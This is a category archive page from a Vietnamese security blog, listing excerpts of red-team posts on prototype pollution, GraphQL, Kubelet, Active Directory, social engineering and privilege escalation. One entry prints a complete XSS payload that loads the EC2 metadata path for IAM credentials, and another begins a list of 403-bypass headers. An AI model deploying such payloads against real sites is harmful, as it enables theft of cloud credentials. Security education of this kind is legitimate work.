Prototype polution là lỗ hổng trong Javascript cho phép attacker thêm các thuộc tính tùy ý vào các đối tượng sử dụng chung trong ngôn ngữ lập trình. Các thuộc tính tùy ý này nếu được xử lý không đúng cách có thể tiềm ẩn nhiều nguy cơ. client: gây ra DOM XSS server: có thể RCE I. Prototype Javascript và tính kế thừaContinueContinue reading “Lỗ hổng Prototype Pollution toàn tập”
Category Archives: Hacking & RED TEAM
Khai thác GraphQL API
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” GraphQL là gì? GraphQL là ngôn ngữ truy vấn API được thiết kế để hỗ trợ giao tiếpContinueContinue reading “Khai thác GraphQL API”
Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Giới thiệu Kubelet là một agent trong từng node, có tác dụng quản lý tất cả container. KubeletContinueContinue reading “Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure”
Pentest/Redteam Active Directory (AD)
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Sr ảnh bìa to hơn ảnh chính :v anh em ấn vào ảnh dưới đây rồi phóng toContinueContinue reading “Pentest/Redteam Active Directory (AD)”
Tấn công Social Engineering toàn tập [part 2]
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social EngineeringContinueContinue reading “Tấn công Social Engineering toàn tập [part 2]”
Tấn công Social Engineering toàn tập [part 1]
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thểContinueContinue reading “Tấn công Social Engineering toàn tập [part 1]”
Dò quét lỗ hổng nâng quyền Windows/Unix
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Hỗ trợ leo quyền bằng LinEnumhttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAShttps://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh Hỗ trợ leo quyền bằng winPEAShttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release
XXS get token from AWS
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” </script><script>document.write(‘<iframe src=\”http://xxx/latest/meta-data/iam/security-credentials/EC2CloudWatchRole\” width=1000px height=1000px>’)</script>
Bypass 403 (in some cases)
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” There are some case that we can apply on the request header. Check it out. Base-Url: 127.0.0.1, 0.0.0.0,ContinueContinue reading “Bypass 403 (in some cases)”
PHP Object Injection a.k.a PHP Insecure Deserialization
Ở PHP lổ hổng deserialization còn được gọi là PHP object injection. Để có thể hiểu về vấn đề này, trước tiên ta phải biết PHP serialize và deserialize một đối tượng như thế nào.PHP có 2 hàm là serialize() và unserialize() đảm nhận 2 nhiệm vụ này. serialize(): PHP object -> plain old stringContinueContinue reading “PHP Object Injection a.k.a PHP Insecure Deserialization”
Nhat Truong Blog 